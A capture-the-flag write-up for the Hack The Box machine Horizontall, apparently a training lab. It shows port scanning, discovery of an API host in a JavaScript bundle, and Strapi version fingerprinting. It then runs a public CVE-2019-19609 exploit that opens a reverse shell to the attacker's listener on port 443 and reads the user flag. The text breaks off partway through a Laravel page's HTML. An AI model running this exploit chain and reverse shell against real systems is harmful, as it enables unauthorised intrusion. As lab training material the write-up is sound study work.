Horizontall-htb-writeup

0x00 Skills covered

Skills in this chapter: sensitive information leakage in front-end JS bundles, exploiting CVE-2019-19609 (Strapi), exploiting CVE-2021-3129 (Laravel/Ignition), SSH port forwarding, writing an SSH public key to the target to log in

Reference: https://0xdf.gitlab.io/2022/02/05/htb-horizontall.html

Reference: https://systemweakness.com/wriet-hack-the-box-horizontall-2c4503a87a49

0x01 Getting user

1. Target IP: 10.10.11.105

2. Check that the target is reachable

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.105 -c 4
PING 10.10.11.105 (10.10.11.105) 56(84) bytes of data.
64 bytes from 10.10.11.105: icmp_seq=1 ttl=63 time=540 ms
64 bytes from 10.10.11.105: icmp_seq=2 ttl=63 time=299 ms
64 bytes from 10.10.11.105: icmp_seq=3 ttl=63 time=295 ms
64 bytes from 10.10.11.105: icmp_seq=4 ttl=63 time=295 ms

--- 10.10.11.105 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 294.912/357.273/540.497/105.794 ms

3. Find the open ports (a fast full-range scan first, then service detection on what it finds)

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.105
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 21:37 CST
Warning: 10.10.11.105 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.105
Host is up (0.36s latency).
Not shown: 59671 closed tcp ports (reset), 5862 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 55.57 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 21:40 CST
Nmap scan report for 10.10.11.105
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.87 seconds

4. The http-title line leaks a hostname (nginx redirects to http://horizontall.htb), so add a hosts entry for it on the attacking machine

┌──(kali㉿kali)-[~/桌面]
└─$ echo '10.10.11.105 horizontall.htb' | sudo tee -a /etc/hosts
10.10.11.105 horizontall.htb

5. Only 80 and 22 are open, so directory brute-force the web root and look for anything that leaks information

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://horizontall.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_horizontall.htb/__23-12-26_21-47-44.txt

Target: http://horizontall.htb/

[21:47:44] Starting:
[21:47:48] 301 - 194B - /js -> http://horizontall.htb/js/
[21:48:54] 301 - 194B - /css -> http://horizontall.htb/css/
[21:49:04] 200 - 4KB - /favicon.ico
[21:49:12] 301 - 194B - /img -> http://horizontall.htb/img/
[21:49:17] 403 - 580B - /js/

Task Completed

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://horizontall.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/favicon.ico (Status: 200) [Size: 4286]
/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/index.html (Status: 200) [Size: 901]
/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

6. Vulnerability enumeration and directory scanning gave no entry point. The breakthrough came from the front-end bundle app.c68eb462.js: the code that loads reviews calls a second virtual host, api-prod.horizontall.htb, which nothing else on the site exposes

http://horizontall.htb/js/app.c68eb462.js

getReviews: function() {
var t = this;
r.a.get(
"http://api-prod.horizontall.htb/reviews"
)
.then((function(s) {
return t.reviews = s.data
}))
}
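A helper for exactly this kind of bundle review, added here as an example (it is not part of the original writeup or of the Horizontall application): it pulls every absolute or scheme-relative URL out of a JS file, keeps only the hosts under the target's domain so CDNs and third parties drop out, and emits the vhost/path pairs plus ready-made /etc/hosts lines. SAMPLE_JS is constructed to resemble the fragment quoted above; the extra host and paths in it are made up for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in the style of the app.c68eb462.js fragment above
# (the push.* host and the /auth/local path are invented for the example).
SAMPLE_JS = r'''
getReviews:function(){var t=this;r.a.get("http://api-prod.horizontall.htb/reviews").then((function(s){return t.reviews=s.data}))},
login:function(){return r.a.post("https://api-prod.horizontall.htb/auth/local",{identifier:this.user})},
assets:"//cdn.example.com/static/app.js",ws:"wss://push.horizontall.htb/socket",
'''

# Absolute (http/https/ws/wss) or scheme-relative (//host/...) URLs; the path
# stops at whitespace, quotes, backticks or a closing bracket.
URL_RE = re.compile(
    r'''(?:https?:|wss?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?::\d+)?(?:/[^\s"'`<>)]*)?'''
)


def extract_endpoints(js_text, base_domain):
    """Return {hostname: sorted paths} for every host that is base_domain or a
    subdomain of it. Anything else (CDNs, fonts, third-party APIs) is dropped."""
    found = {}
    for m in URL_RE.finditer(js_text):
        url = m.group(0)
        if url.startswith("//"):          # scheme-relative URL: borrow a scheme so urlsplit parses it
            url = "http:" + url
        parts = urlsplit(url)
        host = parts.hostname
        if not host:
            continue
        if host != base_domain and not host.endswith("." + base_domain):
            continue
        found.setdefault(host, set()).add(parts.path or "/")
    return {h: sorted(p) for h, p in found.items()}


def hosts_entries(endpoints, ip):
    """/etc/hosts lines for the discovered vhosts; on an HTB box they all map to the one IP."""
    return [f"{ip} {h}" for h in sorted(endpoints)]


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 2 else SAMPLE_JS
    base = sys.argv[2] if len(sys.argv) > 2 else "horizontall.htb"
    ep = extract_endpoints(text, base)
    for host, paths in ep.items():
        print(host, " ".join(paths))
    print("\n".join(hosts_entries(ep, "10.10.11.105")))
```

Usage: `python3 jshosts.py app.c68eb462.js horizontall.htb` (the script name is arbitrary). Run it over every bundle the site serves, not just the main one; chunked builds often put API calls in lazily loaded chunks.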

7. Add a hosts entry for the new virtual host

┌──(kali㉿kali)-[~/桌面]
└─$ echo '10.10.11.105 api-prod.horizontall.htb' | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.105 api-prod.horizontall.htb

8. Look at what the /reviews route returns

http://api-prod.horizontall.htb/reviews

[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]

9. Nothing useful there (three canned reviews), so check the site root of the new host

10. The index page is blank, so run a directory scan against this host as well

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://api-prod.horizontall.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_api-prod.horizontall.htb/__23-12-26_22-15-26.txt

Target: http://api-prod.horizontall.htb/

[22:15:26] Starting:
[22:15:54] 400 - 67B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[22:16:05] 200 - 854B - /ADMIN
[22:16:05] 200 - 854B - /admin
[22:16:05] 200 - 854B - /Admin
[22:16:06] 200 - 854B - /admin/
[22:16:06] 200 - 854B - /Admin/
[22:16:06] 200 - 854B - /admin/%3bindex/
[22:16:06] 200 - 854B - /admin/.config
[22:16:06] 200 - 854B - /admin/_logs/access-log
[22:16:06] 200 - 854B - /admin/.htaccess
[22:16:06] 200 - 854B - /admin/_logs/access_log
[22:16:06] 200 - 854B - /admin/_logs/error_log
[22:16:06] 200 - 854B - /admin/access_log
[22:16:06] 200 - 854B - /admin/_logs/error-log
[22:16:06] 200 - 854B - /admin/account
[22:16:06] 200 - 854B - /admin/admin
[22:16:06] 200 - 854B - /admin/admin-login
[22:16:07] 200 - 854B - /admin/admin/login
[22:16:07] 200 - 854B - /admin/admin_login
[22:16:07] 200 - 854B - /admin/adminLogin
[22:16:07] 200 - 854B - /admin/controlpanel
[22:16:07] 200 - 854B - /admin/backup/
[22:16:07] 200 - 854B - /admin/backups/
[22:16:07] 200 - 854B - /admin/cp
[22:16:07] 200 - 854B - /admin/data/autosuggest
[22:16:07] 200 - 854B - /admin/dumper/
[22:16:07] 200 - 854B - /admin/error_log
[22:16:07] 200 - 854B - /admin/FCKeditor
[22:16:07] 200 - 854B - /admin/heapdump
[22:16:07] 200 - 854B - /admin/db/
[22:16:08] 200 - 854B - /admin/default
[22:16:08] 200 - 854B - /admin/home
[22:16:08] 200 - 854B - /admin/js/tiny_mce
[22:16:08] 200 - 854B - /admin/index.html
[22:16:08] 200 - 854B - /admin/index
[22:16:08] 200 - 854B - /admin/js/tiny_mce/
[22:16:08] 200 - 854B - /admin/js/tinymce/
[22:16:08] 200 - 854B - /admin/js/tinymce
[22:16:08] 200 - 854B - /admin/log
[22:16:08] 200 - 854B - /admin/login
[22:16:08] 200 - 854B - /admin/logs/access-log
[22:16:08] 200 - 854B - /Admin/login/
[22:16:08] 200 - 854B - /admin/logs/
[22:16:08] 200 - 854B - /admin/logs/access_log
[22:16:08] 200 - 854B - /admin/logs/error-log
[22:16:09] 200 - 854B - /admin/manage
[22:16:09] 200 - 854B - /admin/mysql/
[22:16:09] 200 - 854B - /admin/phpMyAdmin
[22:16:09] 200 - 854B - /admin/phpmyadmin/
[22:16:09] 200 - 854B - /admin/pMA/
[22:16:09] 200 - 854B - /admin/pma/
[22:16:09] 200 - 854B - /admin/private/logs
[22:16:09] 200 - 854B - /admin/portalcollect.php?f=http://xxx&t=js
[22:16:09] 200 - 854B - /admin/logs/error_log
[22:16:09] 200 - 854B - /admin/release
[22:16:09] 200 - 854B - /admin/scripts/fckeditor
[22:16:09] 200 - 854B - /admin/signin
[22:16:09] 200 - 854B - /admin/sqladmin/
[22:16:09] 200 - 854B - /admin/sxd/
[22:16:09] 200 - 854B - /admin/sysadmin/
[22:16:09] 200 - 854B - /admin/phpMyAdmin/
[22:16:09] 200 - 854B - /admin/tiny_mce
[22:16:09] 200 - 854B - /admin/tinymce
[22:16:09] 200 - 854B - /admin/web/
[22:16:09] 200 - 854B - /admin/views/ajax/autocomplete/user/a
[22:16:57] 200 - 1KB - /favicon.ico
[22:17:49] 200 - 507B - /reviews
[22:17:49] 200 - 121B - /robots.txt
[22:18:16] 403 - 60B - /users
[22:18:17] 403 - 60B - /users/admin
[22:18:17] 403 - 60B - /users/login.jsp
[22:18:17] 403 - 60B - /users/login.html
[22:18:17] 403 - 60B - /users/login
[22:18:17] 403 - 60B - /users/login.php
[22:18:17] 403 - 60B - /users/login.aspx
[22:18:17] 403 - 60B - /users/admin.php
[22:18:17] 403 - 60B - /users/login.js
[22:18:17] 403 - 60B - /users/

Task Completed

11. The scan finds /admin, the login page of a Strapi CMS instance. Read the output with care: every path under /admin/ comes back 200 with the same 854-byte body, because Strapi's admin panel is a single-page app whose catch-all route serves the same HTML shell for any sub-path, so those dozens of hits are not real files or endpoints. The 403 responses with a 60-byte body on /users and /users/... are more telling: that is a real Strapi API route that the public role is not allowed to read.
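Filtering the scan output by hand is error-prone, so here is an added example (mine, not from the writeup) that parses dirsearch's console lines, groups hits by status code and response size, and collapses a group of paths that all sit under one prefix and all returned an identical body into a single catch-all entry, leaving the genuinely distinct responses visible. SAMPLE is constructed in dirsearch's output format from the scan above.

```python
import re
from collections import defaultdict

# Constructed sample in dirsearch's console format (subset of the scan above).
SAMPLE = """\
[22:16:05] 200 -   854B - /admin
[22:16:06] 200 -   854B - /admin/.htaccess
[22:16:07] 200 -   854B - /admin/backup/
[22:16:08] 200 -   854B - /admin/login
[22:16:57] 200 -     1KB - /favicon.ico
[22:17:49] 200 -   507B - /reviews
[22:17:49] 200 -   121B - /robots.txt
[22:18:16] 403 -    60B - /users
[22:18:17] 403 -    60B - /users/login
"""

# "[HH:MM:SS] <status> - <size> - <path>"  (redirect targets after "->" are ignored)
LINE_RE = re.compile(r'^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+(\S+)\s+-\s+(\S+)')


def parse_dirsearch(text):
    """Yield (status, size, path) for every result line in dirsearch console output."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)


def collapse(text, threshold=3):
    """Split results into (unique, catchall).

    Hits are grouped by (status, size). A group with at least `threshold` paths
    that all share the same first path segment is almost certainly one handler
    answering for everything under that prefix (an SPA shell, a generic 403 page)
    and is reported once as (status, size, prefix, count). Everything else is
    returned unchanged as (status, size, path)."""
    groups = defaultdict(list)
    for status, size, path in parse_dirsearch(text):
        groups[(status, size)].append(path)

    unique, catchall = [], []
    for (status, size), paths in groups.items():
        prefixes = {"/" + p.strip("/").split("/")[0] for p in paths}
        if len(paths) >= threshold and len(prefixes) == 1:
            catchall.append((status, size, prefixes.pop(), len(paths)))
        else:
            unique.extend((status, size, p) for p in paths)
    return sorted(unique), sorted(catchall)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    unique, catchall = collapse(text)
    for status, size, prefix, n in catchall:
        print(f"{status} {size:>6}  {prefix}/*   (catch-all, {n} paths collapsed)")
    for status, size, path in unique:
        print(f"{status} {size:>6}  {path}")
```

The threshold is deliberately low; on a real SPA the /admin group alone is sixty-odd entries. Size-based grouping misses handlers that echo the requested path into the body (sizes then differ by a few bytes), so when a prefix still looks noisy, diff two of the bodies before trusting either.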

12. Searching around, the post below documents an unauthenticated path that discloses the exact Strapi version; it gives the version of this instance directly:

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://api-prod.horizontall.htb/admin/strapiVersion
{"strapiVersion":"3.0.0-beta.17.4"}

13. A Google search turns up a combined exploit for this version:

https://github.com/glowbase/CVE-2019-19609/blob/main/exploit.py

This exploit targets two vulnerabilities in Strapi CMS 3.0.0-beta.17.4 that, chained, give unauthenticated remote code execution (RCE).

CVE-2019-18818
Weak password recovery mechanism for forgotten password

CVSS: 9.8 - Critical

More details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609
Improper neutralization of special elements used in an OS command ("OS command injection")

CVSS: 7.2 - High

More details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
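To turn the version string into a decision, here is an added example (mine, not the exploit author's code) that fetches /admin/strapiVersion and compares the result against the fixed versions stated in the two NVD entries above: 3.0.0-beta.17.5 for CVE-2019-18818 and 3.0.0-beta.17.8 for CVE-2019-19609. The part worth getting right is the comparison: beta.17.10 is newer than beta.17.8, and any beta is older than the 3.0.0 final, so comparing the strings lexically gives wrong answers. It decides from the version alone; it does not prove the instance is exploitable.

```python
import json
import re
from urllib.request import urlopen

# Fixed versions taken from the NVD advisory text linked above.
FIXED_IN = {
    "CVE-2019-18818": "3.0.0-beta.17.5",   # password-reset bypass
    "CVE-2019-19609": "3.0.0-beta.17.8",   # command injection in plugin install/uninstall
}

# major.minor.patch, optional "-<tag>.<n>.<n>..." pre-release suffix (Strapi style)
VERSION_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)((?:\.\d+)*))?$')


def parse_version(v):
    """Turn '3.0.0-beta.17.4' into a tuple that compares the way semver intends.

    Layout: (major, minor, patch, is_final, tag, numeric_suffix). A pre-release
    (is_final=0) sorts below the final release with the same numbers, and the
    numbers after the tag are compared as integers, so beta.17.10 > beta.17.8."""
    m = VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    tag, nums = m.group(4), m.group(5)
    if tag is None:
        return (major, minor, patch, 1, "", ())
    suffix = tuple(int(n) for n in nums.split(".") if n)
    return (major, minor, patch, 0, tag.lower(), suffix)


def affected_cves(version):
    """CVE ids from FIXED_IN whose fix is newer than `version` (sorted)."""
    v = parse_version(version)
    return sorted(cve for cve, fixed in FIXED_IN.items() if v < parse_version(fixed))


def fetch_strapi_version(base_url, timeout=10):
    """Read the unauthenticated /admin/strapiVersion endpoint used in the writeup."""
    with urlopen(f"{base_url.rstrip('/')}/admin/strapiVersion", timeout=timeout) as r:
        return json.load(r)["strapiVersion"]


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://api-prod.horizontall.htb"
    ver = fetch_strapi_version(base)
    print(ver, affected_cves(ver) or "not affected by the CVEs in FIXED_IN")
```

The endpoint itself is a finding worth noting in a report: an unauthenticated route that states the exact framework version is what let this whole chain start.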

14. Save the exploit as exploit.py (the touch below only creates the file; the script body from the repository was pasted into it), start a listener on 443, and run it against the API host with the Kali IP as the callback address

┌──(kali㉿kali)-[~/桌面]
└─$ touch exploit.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 exploit.py http://api-prod.horizontall.htb 10.10.14.2 443
========================================================
| STRAPI REMOTE CODE EXECUTION (CVE-2019-19609) |
========================================================
[+] Checking Strapi CMS version
[+] Looks like this exploit should work!
[+] Executing exploit

15. The listener receives the reverse shell; it runs as the strapi service user

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.105] 49878
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)

16. There is a single home directory, developer. Its user.txt is world-readable (-r--r--r--) and the directory itself is traversable (drwxr-xr-x), so the first flag can be read as strapi without any further privilege escalation

$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 May 25 2021 .
drwxr-xr-x 24 root root 4096 Aug 23 2021 ..
drwxr-xr-x 8 developer developer 4096 Aug 2 2021 developer
$ ls -la /home/developer
total 108
drwxr-xr-x 8 developer developer 4096 Aug 2 2021 .
drwxr-xr-x 3 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 root root 9 Aug 2 2021 .bash_history -> /dev/null
-rw-r----- 1 developer developer 242 Jun 1 2021 .bash_logout
-rw-r----- 1 developer developer 3810 Jun 1 2021 .bashrc
drwx------ 3 developer developer 4096 May 26 2021 .cache
-rw-rw---- 1 developer developer 58460 May 26 2021 composer-setup.php
drwx------ 5 developer developer 4096 Jun 1 2021 .config
drwx------ 3 developer developer 4096 May 25 2021 .gnupg
drwxrwx--- 3 developer developer 4096 May 25 2021 .local
drwx------ 12 developer developer 4096 May 26 2021 myproject
-rw-r----- 1 developer developer 807 Apr 4 2018 .profile
drwxrwx--- 2 developer developer 4096 Jun 4 2021 .ssh
-r--r--r-- 1 developer developer 33 Dec 26 13:36 user.txt
lrwxrwxrwx 1 root root 9 Aug 2 2021 .viminfo -> /dev/null
$ cat /home/developer/user.txt
2eebcc56232c8e60a8645d8b83b3ebd3
$

0x02 Getting root

17. Enumerate the Strapi application directory (/opt/strapi/myapi; the strapi user's home is /opt/strapi) and upgrade the shell to a PTY. Nothing useful turns up in the application tree itself

$ pwd
/opt/strapi/myapi
$ ls -la
total 648
drwxr-xr-x 9 strapi strapi 4096 Jul 29 2021 .
drwxr-xr-x 9 strapi strapi 4096 Aug 2 2021 ..
drwxr-xr-x 3 strapi strapi 4096 May 29 2021 api
drwxrwxr-x 2 strapi strapi 12288 May 26 2021 build
drwxrwxr-x 5 strapi strapi 4096 May 26 2021 .cache
drwxr-xr-x 5 strapi strapi 4096 Jul 29 2021 config
-rw-r--r-- 1 strapi strapi 249 May 26 2021 .editorconfig
-rw-r--r-- 1 strapi strapi 32 May 26 2021 .eslintignore
-rw-r--r-- 1 strapi strapi 541 May 26 2021 .eslintrc
drwxr-xr-x 3 strapi strapi 4096 May 26 2021 extensions
-rw-r--r-- 1 strapi strapi 1150 May 26 2021 favicon.ico
-rw-r--r-- 1 strapi strapi 1119 May 26 2021 .gitignore
drwxrwxr-x 1099 strapi strapi 36864 Aug 3 2021 node_modules
-rw-rw-r-- 1 strapi strapi 1009 May 26 2021 package.json
-rw-rw-r-- 1 strapi strapi 552845 May 26 2021 package-lock.json
drwxr-xr-x 3 strapi strapi 4096 Jun 2 2021 public
-rw-r--r-- 1 strapi strapi 69 May 26 2021 README.md
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
strapi@horizontall:~/myapi$

18. Listing the listening sockets, however, shows services bound to localhost only: 1337 (Strapi's default port), 8000, and MySQL. Port 8000 is something new and is not reachable from outside

strapi@horizontall:~/myapi$ ss -tl
ss -tl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:http 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 128 127.0.0.1:1337 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 80 127.0.0.1:mysql 0.0.0.0:*
LISTEN 0 128 [::]:http [::]:*
LISTEN 0 128 [::]:ssh [::]:*

19. curl the service on 8000 from the shell on the box

strapi@horizontall:~/myapi$ curl 127.0.0.1:8000
curl 127.0.0.1:8000
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title>Laravel</title>

<!-- Fonts -->
<link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700&display=swap" rel="stylesheet">

<!-- Styles -->
<style>
/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-gray-100{--bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-t{border-top-width:1px}.flex{display:flex}.grid{display:grid}.hidden{display:none}.items-center{align-items:center}.justify-center{justify-content:center}.font-semibold{font-weight:600}.h-5{height:1.25rem}.h-8{height:2rem}.h-16{height:4rem}.text-sm{font-size:.875rem}.text-lg{font-size:1.125rem}.leading-7{line-height:1.75rem}.mx-auto{margin-left:auto;margin-right:auto}.ml-1{margin-left:.25rem}.mt-2{margin-top:.5rem}.mr-2{margin-right:.5rem}.ml-2{margin-left:.5rem}.mt-4{margin-top:1rem}.ml-4{margin-left:1rem}.mt-8{margin-top:2rem}.ml-12{margin-left:3rem}.-mt-px{margin-top:-1px}.max-w-6xl{max-width:72rem}.min-h-screen{min-height:100vh}.overflow-hidden{overflow:hidden}.p-6{padding:1.5rem}.py-4{padding-top:1rem;padding-bottom:1rem}.px-6{padding-left:1.5rem;padding-right:1.5rem}.pt-8{padding-top:2rem}.fixed{position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 
rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,247,var(--text-opacity))}.text-gray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,104,var(--text-opacity))}.text-gray-900{--text-opacity:1;color:#1a202c;color:rgba(26,32,44,var(--text-opacity))}.underline{text-decoration:underline}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.w-5{width:1.25rem}.w-8{width:2rem}.w-auto{width:auto}.grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}@media (min-width:640px){.sm\:rounded-lg{border-radius:.5rem}.sm\:block{display:block}.sm\:items-center{align-items:center}.sm\:justify-start{justify-content:flex-start}.sm\:justify-between{justify-content:space-between}.sm\:h-20{height:5rem}.sm\:ml-0{margin-left:0}.sm\:px-6{padding-left:1.5rem;padding-right:1.5rem}.sm\:pt-0{padding-top:0}.sm\:text-left{text-align:left}.sm\:text-right{text-align:right}}@media (min-width:768px){.md\:border-t-0{border-top-width:0}.md\:border-l{border-left-width:1px}.md\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}}@media (min-width:1024px){.lg\:px-8{padding-left:2rem;padding-right:2rem}}@media 
(prefers-color-scheme:dark){.dark\:bg-gray-800{--bg-opacity:1;background-color:#2d3748;background-color:rgba(45,55,72,var(--bg-opacity))}.dark\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}}
</style>

<style>
body {
font-family: 'Nunito';
}
</style>
</head>
<body class="antialiased">
<div class="relative flex items-top justify-center min-h-screen bg-gray-100 dark:bg-gray-900 sm:items-center sm:pt-0">

<div class="max-w-6xl mx-auto sm:px-6 lg:px-8">
<div class="flex justify-center pt-8 sm:justify-start sm:pt-0">
<svg viewBox="0 0 651 192" fill="none" xmlns="http://www.w3.org/2000/svg" class="h-16 w-auto text-gray-700 sm:h-20">
<g clip-path="url(#clip0)" fill="#EF3B2D">
<path d="M248.032 44.676h-16.466v100.23h47.394v-14.748h-30.928V44.676zM337.091 87.202c-2.101-3.341-5.083-5.965-8.949-7.875-3.865-1.909-7.756-2.864-11.669-2.864-5.062 0-9.69.931-13.89 2.792-4.201 1.861-7.804 4.417-10.811 7.661-3.007 3.246-5.347 6.993-7.016 11.239-1.672 4.249-2.506 8.713-2.506 13.389 0 4.774.834 9.26 2.506 13.459 1.669 4.202 4.009 7.925 7.016 11.169 3.007 3.246 6.609 5.799 10.811 7.66 4.199 1.861 8.828 2.792 13.89 2.792 3.913 0 7.804-.955 11.669-2.863 3.866-1.908 6.849-4.533 8.949-7.875v9.021h15.607V78.182h-15.607v9.02zm-1.431 32.503c-.955 2.578-2.291 4.821-4.009 6.73-1.719 1.91-3.795 3.437-6.229 4.582-2.435 1.146-5.133 1.718-8.091 1.718-2.96 0-5.633-.572-8.019-1.718-2.387-1.146-4.438-2.672-6.156-4.582-1.719-1.909-3.032-4.152-3.938-6.73-.909-2.577-1.36-5.298-1.36-8.161 0-2.864.451-5.585 1.36-8.162.905-2.577 2.219-4.819 3.938-6.729 1.718-1.908 3.77-3.437 6.156-4.582 2.386-1.146 5.059-1.718 8.019-1.718 2.958 0 5.656.572 8.091 1.718 2.434 1.146 4.51 2.674 6.229 4.582 1.718 1.91 3.054 4.152 4.009 6.729.953 2.577 1.432 5.298 1.432 8.162-.001 2.863-.479 5.584-1.432 8.161zM463.954 87.202c-2.101-3.341-5.083-5.965-8.949-7.875-3.865-1.909-7.756-2.864-11.669-2.864-5.062 0-9.69.931-13.89 2.792-4.201 1.861-7.804 4.417-10.811 7.661-3.007 3.246-5.347 6.993-7.016 11.239-1.672 